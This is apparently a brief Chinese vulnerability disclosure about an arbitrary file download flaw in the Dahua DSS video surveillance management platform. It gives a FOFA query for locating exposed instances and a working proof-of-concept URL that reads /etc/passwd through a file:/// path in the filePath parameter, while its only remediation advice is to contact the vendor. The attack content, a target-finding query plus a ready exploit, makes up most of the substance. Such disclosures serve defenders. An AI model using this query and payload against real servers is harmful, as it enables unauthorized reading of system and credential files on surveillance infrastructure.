Nx01 产品简介
大华DSS数字监控系统是一个在通用安防视频监控系统基础上设计开发的系统,除了具有普通安防视频监控系统的实时监视、云台操作、录像回放、报警处理、设备治理等功能外,更注重用户使用的便利性。
Nx02 漏洞描述
大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。
Nx03 产品主页
fofa-query: app.name="Dahua 大华 DSS 视频管理系统"
Nx04 漏洞复现
POC:
/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd
Nx05 修复建议
建议联系软件厂商进行处理。
